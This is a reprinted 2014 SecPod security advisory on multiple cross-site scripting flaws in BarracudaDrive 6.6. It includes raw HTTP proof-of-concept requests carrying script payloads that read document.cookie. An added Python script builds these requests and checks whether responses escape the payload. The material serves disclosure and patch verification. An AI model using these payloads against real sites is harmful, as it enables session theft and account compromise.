
BarracudaDrive 6.6 Cross Site Scripting

18 Mar 2014 00:00:00
Reported by Prabhu S Angadi
Type: packetstorm
Source: packetstormsecurity.com

BarracudaDrive 6.6 Cross Site Scripting Vulnerabilities Discovered

Code
`##############################################################################  
#  
# Title : BarracudaDrive Multiple XSS Vulnerabilities  
# Author : Prabhu S Angadi SecPod Technologies Pvt. Ltd. http://www.secpod.com  
# Vendor : http://barracudadrive.com  
# Advisory : http://secpod.org/blog/?p=2158  
# http://secpod.org/advisories/SecPod_BarracudaDrive_Mult_XSS_Vuln.txt  
# Software : BarracudaDrive 6.6  
# Date : 24/02/2014  
#  
##############################################################################  
  
SecPod ID: 1049  
  
24/02/2014 Issue Discovered  
07/03/2014 Vendor Notified  
07/03/2014 Vendor Responded  
13/03/2014 Vendor Solution  
17/03/2014 Advisory Released  
  
  
Class: Cross-Site Scripting  
Severity: Medium  
  
  
Overview:  
---------  
BarracudaDrive Multiple Cross-Site Scripting Vulnerabilities (reflected, and  
stored in the cases noted below).  
  
  
Technical Description:  
----------------------  
  
Multiple cross-site scripting vulnerabilities are present in BarracudaDrive  
because user-supplied input is written back into HTML responses without being  
encoded. Most are reflected; in items 6, 8 and 10 the submitted value is  
stored and rendered later on a different management page, so those cases are  
stored rather than reflected XSS.  
  
In each of the following cases the named parameters are returned to the user  
without proper verification. This can be exploited to execute arbitrary HTML  
and script code in a user's browser session in the context of the vulnerable  
site.  
  
1) The 'sForumName' and 'sDescription' parameters of  
'/Forum/manage/ForumManager.lsp?nForumId=1'.  
  
2) The 'sHint' and 'sWord' parameters of '/Forum/manage/hangman.lsp?nId=1'.  
  
3) The 'nId' parameter of '/Forum/manage/hangman.lsp'.  
  
4) The 'sForumName' and 'sDescription' parameters of  
'/Forum/manage/ForumManager.lsp?newforum=true'.  
  
5) The 'user' parameter of '/rtl/protected/admin/wizard/setuser.lsp'.  
  
6) The 'name' and 'email' parameters of '/feedback.lsp'. The stored values  
are rendered in '/private/manage/messages.lsp' and  
'/private/manage/messages.lsp?key=1'.  
  
7) The 'lname' and 'url' parameters of  
'/private/manage/PageManager.lsp?parent=0&newpage=true'.  
  
8) The 'lname' and 'url' parameters of  
'/private/manage/PageManager.lsp?parent=0&edit=9'. The stored values are  
rendered in '/private/manage/PageManager.lsp'.  
  
9) The 'cmd' parameter of '/fs'.  
  
10) The 'newname' and 'description' parameters of  
'/rtl/protected/mail/manage/list.lsp'. The stored values are rendered in  
'/rtl/protected/mail/manage/lists.lsp'.  
  
11) The 'firstname', 'lastname' and 'id' parameters of  
'/rtl/protected/mail/manage/list.lsp?name=test'.  
  
12) The path component after '/fs/' (see proof of concept 12).  
  
These issues were tested on BarracudaDrive 6.6. Other versions may also be  
affected.  
  
  
Impact:  
--------  
Successful exploitation allows an authenticated attacker to execute arbitrary  
HTML and script code in a user's browser session in the context of the  
vulnerable site. The injected script runs with the privileges of whoever  
views the affected page. For the stored cases (items 6, 8 and 10) that is  
the user viewing the management pages, and in item 6 the input originates  
from the site's feedback form (the proof of concept is submitted from  
'/Contact-Us.html'), so the submitting user and the victim need not be the  
same person.  
  
  
Affected Software:  
------------------  
BarracudaDrive 6.6  
  
Tested on,  
BarracudaDrive 6.6 on Windows OS  
BarracudaDrive 6.6 on Linux OS  
  
  
References:  
-----------  
http://secpod.org/blog/?p=2158  
http://secpod.org/advisories/SecPod_BarracudaDrive_Mult_XSS_Vuln.txt  
  
  
Proof of Concept:  
----------------  
1) POST /Forum/manage/ForumManager.lsp?nForumId=1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/Forum/manage/ForumManager.lsp?nForumId=1  
Cookie: z9ZAqJtI=714dd7c0530d8b06  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 170  
  
Post Data :   
==========  
nSortOrder=0&sForumName=<script>alert(document.cookie)</script>&sDescription=<script>alert(document.cookie)</script>&deleteforum=no&nForumId=1  
  
2) POST /Forum/manage/hangman.lsp?nId=1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/Forum/manage/hangman.lsp?nId=1  
Cookie: z9ZAqJtI=714dd7c0530d8b06  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 135  
  
Post Data :   
===========  
sHint=<script>alert(document.cookie)</script>&sWord=<script>alert(document.cookie)</script>&save=Save&nId=1  
  
3) GET /Forum/manage/hangman.lsp?nId=<script>alert(document.cookie)</script>   
(requires at least one entry in the Word Manager table)  
  
4) POST /Forum/manage/ForumManager.lsp?newforum=true  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/Forum/manage/ForumManager.lsp?newforum=true  
Cookie: z9ZAqJtI=714dd7c0530d8b06  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 171  
  
Post Data :   
==========  
nSortOrder=0&sForumName=<script>alert(document.cookie)</script>&sDescription=<script>alert(document.cookie)</script>&deleteforum=no&nForumId=-1  
  
5) POST /rtl/protected/admin/wizard/setuser.lsp  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/rtl/protected/admin/wizard/setuser.lsp  
Cookie: z9ZAqJtI=714dd7c0530d8b06  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 92  
  
Post Data :   
==========  
user=<script>alert(document.cookie)</script>&password=test&path=/c/bdusers  
  
6) POST /feedback.lsp  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/Contact-Us.html  
Cookie: z9ZAqJtI=714dd7c0530d8b06  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 226  
  
Post Data :  
==========  
name=<script>alert(document.cookie)</script>&email=<script>alert(document.cookie)</script>&message=test&k1=1393176261&k2=652054939&ck1=JBxYStg2gm3CuvlMdKlxsA==&ck2=JxxfTNM1hm7Nu/YxAAAAAA==  
  
The payload is rendered on:  
/private/manage/messages.lsp  
/private/manage/messages.lsp?key=1  
  
7) POST /private/manage/PageManager.lsp?parent=0&newpage=true  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/private/manage/PageManager.lsp?parent=0&newpage=true  
Cookie: tzone=--330; z9ZAqJtI=714dd7c0530d8b06  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 158  
  
Post Data :   
==========  
position=0&lname=<script>alert(document.cookie)</script>&url=<script>alert(document.cookie)</script>&deletepage=no&parent=0&key=-1  
  
8) POST /private/manage/PageManager.lsp?parent=0&edit=9  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/private/manage/PageManager.lsp?parent=0&edit=9  
Cookie: tzone=--330; z9ZAqJtI=714dd7c0530d8b06  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 174  
  
Post Data :   
===========  
position=0&lname=<script>alert(document.cookie)</script>&url=<script>alert(document.cookie)</script>&cancel=Cancel&deletepage=no&parent=0&key=9  
  
The payload is rendered on: /private/manage/PageManager.lsp  
  
9) GET /fs/?cmd=<script>alert(document.cookie)</script>  
  
10) POST /rtl/protected/mail/manage/list.lsp  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/rtl/protected/mail/manage/list.lsp  
Cookie: tzone=--330; z9ZAqJtI=714dd7c0530d8b06  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 99  
  
Post Data :   
===========  
newname=<script>alert(document.cookie)</script>&description=<script>alert(document.cookie)</script>&save=Create+New+List  
  
The payload is rendered on '/rtl/protected/mail/manage/lists.lsp'  
  
11) POST /rtl/protected/mail/manage/list.lsp?name=test  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/rtl/protected/mail/manage/list.lsp?name=test  
Cookie: tzone=--330; z9ZAqJtI=714dd7c0530d8b06  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 259  
  
Post Data :   
==========  
listkey=2&[email protected]&firstname=<script>alert(document.cookie)</script>&lastname=<script>alert(document.cookie)</script>&id=<script>alert(document.cookie)</script>&addsub=save&name=test&offset=0&save=Save  
  
12) GET /fs/<script>alert(document.cookie)</script>   
(payload in the path component under '/fs/')  
  
  
Solution:  
----------  
Upgrade to BarracudaDrive 6.7  
  
  
Risk Factor:  
-------------  
CVSS Score Report:   
ACCESS_VECTOR = NETWORK   
ACCESS_COMPLEXITY = MEDIUM   
AUTHENTICATION = SINGLE INSTANCE   
CONFIDENTIALITY_IMPACT = NONE   
INTEGRITY_IMPACT = PARTIAL   
AVAILABILITY_IMPACT = NONE   
EXPLOITABILITY = PROOF_OF_CONCEPT   
REMEDIATION_LEVEL = UNAVAILABLE   
REPORT_CONFIDENCE = CONFIRMED   
CVSS Base Score = 3.5 (AV:N/AC:M/Au:S/C:N/I:P/A:N)   
CVSS Temporal Score = 3.1 (E:POC/RL:U/RC:C)   
Risk factor = Medium   
   
Note: the remediation level above was scored as UNAVAILABLE although the   
vendor fix (6.7) is listed under Solution; rescored with RL:OF the temporal   
score is 2.7.   
  
  
Credits:  
--------  
Prabhu S Angadi of SecPod Technologies is credited with the discovery of  
these vulnerabilities.  
`
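The script below is an added example and is not part of the SecPod advisory or of BarracudaDrive. It turns the twelve proof-of-concept items above into a table of requests, renders each as a raw HTTP request with a correct Content-Length, and classifies a captured response body as `unescaped` (payload echoed verbatim, still vulnerable), `escaped` (every copy HTML-encoded, the state a fixed build should show) or `absent`. For the stored cases it points at the pages the advisory says render the value. The host name, the sample response bodies and the `RENDERS_ON` table are constructed for the example; the script makes no network connection, so feed it bodies captured from an instance you are authorized to test.

```python
import html
from urllib.parse import quote, urlencode

PAYLOAD = "<script>alert(document.cookie)</script>"

# One row per proof-of-concept item: (item, method, request target, form fields
# or None for GET). Item 6 also carried k1/k2/ck1/ck2 form tokens in the
# advisory; they look form-specific and are omitted here (assumption), so take
# them from a fresh load of the contact form. Item 11's e-mail field is garbled
# on this page and is left out.
POCS = [
    (1, "POST", "/Forum/manage/ForumManager.lsp?nForumId=1",
     {"nSortOrder": "0", "sForumName": PAYLOAD, "sDescription": PAYLOAD,
      "deleteforum": "no", "nForumId": "1"}),
    (2, "POST", "/Forum/manage/hangman.lsp?nId=1",
     {"sHint": PAYLOAD, "sWord": PAYLOAD, "save": "Save", "nId": "1"}),
    (3, "GET", "/Forum/manage/hangman.lsp?nId=" + quote(PAYLOAD, safe=""), None),
    (4, "POST", "/Forum/manage/ForumManager.lsp?newforum=true",
     {"nSortOrder": "0", "sForumName": PAYLOAD, "sDescription": PAYLOAD,
      "deleteforum": "no", "nForumId": "-1"}),
    (5, "POST", "/rtl/protected/admin/wizard/setuser.lsp",
     {"user": PAYLOAD, "password": "test", "path": "/c/bdusers"}),
    (6, "POST", "/feedback.lsp",
     {"name": PAYLOAD, "email": PAYLOAD, "message": "test"}),
    (7, "POST", "/private/manage/PageManager.lsp?parent=0&newpage=true",
     {"position": "0", "lname": PAYLOAD, "url": PAYLOAD, "deletepage": "no",
      "parent": "0", "key": "-1"}),
    (8, "POST", "/private/manage/PageManager.lsp?parent=0&edit=9",
     {"position": "0", "lname": PAYLOAD, "url": PAYLOAD, "deletepage": "no",
      "parent": "0", "key": "9"}),
    (9, "GET", "/fs/?cmd=" + quote(PAYLOAD, safe=""), None),
    (10, "POST", "/rtl/protected/mail/manage/list.lsp",
     {"newname": PAYLOAD, "description": PAYLOAD, "save": "Create New List"}),
    (11, "POST", "/rtl/protected/mail/manage/list.lsp?name=test",
     {"listkey": "2", "firstname": PAYLOAD, "lastname": PAYLOAD, "id": PAYLOAD,
      "addsub": "save", "name": "test", "offset": "0", "save": "Save"}),
    (12, "GET", "/fs/" + quote(PAYLOAD, safe=""), None),
]

# Stored cases: the advisory says the value is rendered on these pages, not on
# the page that received the POST.
RENDERS_ON = {
    6: ["/private/manage/messages.lsp", "/private/manage/messages.lsp?key=1"],
    8: ["/private/manage/PageManager.lsp"],
    10: ["/rtl/protected/mail/manage/lists.lsp"],
}


def build_request(method, target, fields, host="localhost", cookie=None):
    """Render one PoC as a raw HTTP/1.1 request with a correct Content-Length."""
    body = urlencode(fields) if fields is not None else ""
    lines = [f"{method} {target} HTTP/1.1", f"Host: {host}"]
    if cookie:
        lines.append(f"Cookie: {cookie}")
    if fields is not None:
        lines.append("Content-Type: application/x-www-form-urlencoded")
        lines.append(f"Content-Length: {len(body.encode())}")
    return "\r\n".join(lines) + "\r\n\r\n" + body


def classify(body, payload=PAYLOAD):
    """Decide what the server did with the payload.

    'unescaped': the payload appears verbatim, so the page is still vulnerable
                 (a verbatim echo inside a quoted attribute is still an
                 encoding failure; inspect the context by hand).
    'escaped':   every copy was HTML-encoded (&lt;, &#60;, &#x3c; ...), which
                 is what a fixed page should show.
    'absent':    the page does not echo the value at all.
    """
    if payload in body:
        return "unescaped"
    if payload in html.unescape(body):
        return "escaped"
    return "absent"


def pages_to_check(item, target):
    """Where to look for the echoed value: the injection page, or for stored
    cases the pages listed in RENDERS_ON."""
    return RENDERS_ON.get(item, [target])


def verify(responses):
    """responses: {item: response body} -> {item: classification}."""
    return {item: classify(body) for item, body in responses.items()}


# Constructed sample bodies (not captured from BarracudaDrive), one per outcome.
SAMPLE_VULNERABLE = "<td>Forum name:</td><td>" + PAYLOAD + "</td>"
SAMPLE_FIXED = "<td>Forum name:</td><td>" + html.escape(PAYLOAD) + "</td>"
SAMPLE_FIXED_NUMERIC = "<td>&#60;script&#62;alert(document.cookie)&#60;/script&#62;</td>"

if __name__ == "__main__":
    for item, method, target, fields in POCS:
        print(build_request(method, target, fields))
        print("check:", ", ".join(pages_to_check(item, target)), "\n")
    print(verify({1: SAMPLE_VULNERABLE, 4: SAMPLE_FIXED, 6: SAMPLE_FIXED_NUMERIC}))
```

Classification unescapes the whole body before the second check so that named, decimal and hexadecimal entity forms are all accepted as a fix; a raw match is tested first, so a page that encodes one copy of the value but echoes another verbatim is still reported as unescaped.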
